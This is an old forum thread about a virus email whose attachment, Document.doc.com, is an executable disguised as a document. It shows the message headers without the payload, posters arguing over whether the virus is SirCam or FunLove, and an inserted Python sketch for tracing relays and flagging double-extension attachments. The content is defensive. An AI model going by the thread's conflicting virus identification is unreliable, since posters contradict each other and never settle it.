-
Nov 7th, 2001, 10:26 AM
#1
Thread Starter
Dazed Member
Urgent. Please Help!
Ok, I got your attention. I just received a
virus in my email and this has never happened
to me before. The web address is unfamiliar to me.
Is there any way that I can trace where it originated from?
And I was able to view the contents of
the file using an option Hotmail provides.
Does this look like compiled source code to you?
I haven't a clue. Thanks all.
From [email protected] Wed, 07 Nov 2001 04:39:28 -0800
Received: from [12.26.191.39] by hotmail.com (3.2) with ESMTP id MHotMailBDB276640034400437230C1ABF270E7E0; Wed, 07 Nov 2001 04:39:09 -0800
Received: from node5 (210.212.157.254) by mail_server with SMTP; Wed, 7 Nov 2001 07:38:49 -0800
From: "sachet"<[email protected]>
To: [email protected]
Subject: Document
date: Wed, 7 Nov 2001 18:07:30 +0530
MIME-Version: 1.0
X-MIMEOLE: Produced By Microsoft MimeOLE V5.50.4133.2400
X-Mailer: Microsoft Outlook Express 5.50.4133.2400
Content-Type: multipart/mixed; boundary="----3647B4BD_Outlook_Express_message_boundary"
Content-Disposition: Multipart message
------3647B4BD_Outlook_Express_message_boundary
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: message text
Hi! How are you=3F
I send you this file in order to have your advice
See you later=2E Thanks
------3647B4BD_Outlook_Express_message_boundary
Content-Type: application/mixed; name=Document.doc.com
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename=Document.doc.com
------3647B4BD_Outlook_Express_message_boundary
-
Nov 7th, 2001, 10:32 AM
#2
PowerPoster
There's not a great deal you can do about
Just be thankful it didn't infect you
-
Nov 7th, 2001, 10:55 AM
#3
Thread Starter
Dazed Member
What is all that crap though.
Is it source code?
-
Nov 7th, 2001, 11:06 AM
#4
PowerPoster
Must be
ASCII representation of assembler perhaps
-
Nov 7th, 2001, 06:29 PM
#5
Lively Member
That's just a simple com executable {attachment} disguised as a doc document.
The purpose of the executable is to propagate by sending itself to several others in your contacts list.
I have received them several times in the past few months, but never opened them.
Marriage - is not a word, but a sentence.
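An added triage sketch (not code from the thread or any poster) for the two questions raised above: which relays the message passed through, and why Document.doc.com is not a document. The sample message is constructed from the headers in post #1 with placeholder addresses and a dummy attachment body, and the extension lists are assumptions.

```python
import email
import re
# Constructed sample modeled on the headers in post #1. The addresses, the
# ESMTP id and the attachment body ("dummy" in base64) are placeholders.
SAMPLE = """\
Received: from [12.26.191.39] by hotmail.com (3.2) with ESMTP id PLACEHOLDER; Wed, 07 Nov 2001 04:39:09 -0800
Received: from node5 (210.212.157.254) by mail_server with SMTP; Wed, 7 Nov 2001 07:38:49 -0800
From: "sachet" <sender@example.invalid>
Content-Type: multipart/mixed; boundary="b1"

--b1

Hi! How are you?
--b1
Content-Type: application/mixed; name=Document.doc.com
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename=Document.doc.com

ZHVtbXk=
--b1--
"""

EXECUTABLE_EXT = {"com", "exe", "pif", "bat", "scr", "lnk", "vbs"}  # assumed list
DOCUMENT_EXT = {"doc", "xls", "txt", "jpg", "zip", "pdf"}           # assumed list
IP_RE = re.compile(r"\b\d{1,3}(?:\.\d{1,3}){3}\b")

def received_chain(msg):
    """Relay IPs, oldest hop first. Each server prepends its own Received
    header; only those added by servers you trust are reliable."""
    hops = []
    for value in reversed(msg.get_all("Received", [])):
        match = IP_RE.search(value.split(" by ", 1)[0])  # the "from" clause
        hops.append(match.group(0) if match else None)
    return hops

def disguised_attachments(msg):
    """Filenames like name.doc.com: document-looking, executable at the end."""
    flagged = []
    for part in msg.walk():
        ext = (part.get_filename() or "").lower().split(".")
        if len(ext) >= 3 and ext[-1] in EXECUTABLE_EXT and ext[-2] in DOCUMENT_EXT:
            flagged.append(part.get_filename())
    return flagged

def triage(raw):
    """Parse a raw message and return (relay chain, flagged attachments)."""
    msg = email.message_from_string(raw)
    return received_chain(msg), disguised_attachments(msg)

print(triage(SAMPLE))
```

The lower Received line is written by a server outside the recipient's control, so treat its address as a claim about the origin rather than proof of it.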
-
Nov 7th, 2001, 06:46 PM
#6
Member
The body sounds familiar, like a SirCam or something.
-
Nov 7th, 2001, 07:03 PM
#7
Thread Starter
Dazed Member
So the text is really nothing since it is actually a .doc? Would that be right? How could I get to the underlying program and could I decompile it? Thanks
-
Nov 7th, 2001, 07:09 PM
#8
Lively Member
It's not a doc...delete it !!!
-
Nov 8th, 2001, 03:37 AM
#9
Retired VBF Adm1nistrator
Microsoft MVP : Visual Developer - Visual Basic [2004-2005]
-
Nov 8th, 2001, 10:32 AM
#10
Thread Starter
Dazed Member
It's W32/FunLove.gen Virus.
-
Nov 8th, 2001, 10:39 AM
#11
Thread Starter
Dazed Member
Here's the information on this virus in case anyone happens to
get it.
http://vil.mcafee.com/dispVirus.asp?virus_k=10419&
-
Nov 9th, 2001, 04:16 AM
#12
Retired VBF Adm1nistrator
No, that's the Sircam virus.
-
Nov 9th, 2001, 11:09 AM
#13
Thread Starter
Dazed Member
Not according to McAfee's site.
-
Nov 9th, 2001, 12:19 PM
#14
Retired VBF Adm1nistrator
How many times do I have to say this... the body of that message is the Sircam virus, and the way the attachment is named also indicates Sircam.
If McAfee call it otherwise, then they're wrong.
-
Nov 9th, 2001, 02:18 PM
#15
Thread Starter
Dazed Member
No need to get your feathers in a ruffle. I'm just saying what they say. I could care less what the name is or what type of virus it is.
-
Nov 12th, 2001, 05:09 AM
#16
Retired VBF Adm1nistrator
Originally posted by chrisjk
no offense Jamie, but I think McAfee know more about viri than you do
Yeah they probably do, but I remember distinctly that virus.
I had to take it out of two infected sites, and it's a pain in the hole.
http://vil.nai.com/vil/virusSummary.asp?virus_k=99141
[edit]
This is the funlove virus :
http://vil.nai.com/vil/virusSummary.asp?virus_k=10419
[/edit]